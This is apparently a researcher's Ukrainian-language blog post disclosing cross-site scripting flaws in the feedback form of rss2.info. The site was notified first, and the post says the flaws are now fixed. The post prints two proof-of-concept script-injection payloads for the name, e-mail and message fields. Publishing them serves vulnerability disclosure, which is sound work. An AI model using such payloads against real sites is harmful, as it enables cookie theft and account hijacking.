Уразливості на www.rss2.info

20:36 27.02.2008

24.09.2007

У квітні, 09.04.2007, я знайшов Cross-Site Scripting уразливості на проекті http://www.rss2.info (агрегатор новин). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

27.02.2008

XSS:

XSS:

POST запит на сторінці http://www.rss2.info/feedback.php:

"><script>alert(document.cookie)</script>В полях: Ваше имя, Ваш E-mail.

</textarea><script>alert(document.cookie)</script>В полі: Сообщение.

Дані уразливості вже виправлені. Причому зроблено це в доволі цікавий спосіб: вразливі скрипти на сайті просто прибрані (щоб не паритися з їх виправленням). Сайт взагалі змінив концепцію і тепер це на агрегатор новин, а блог про RSS.


Leave a Reply

You must be logged in to post a comment.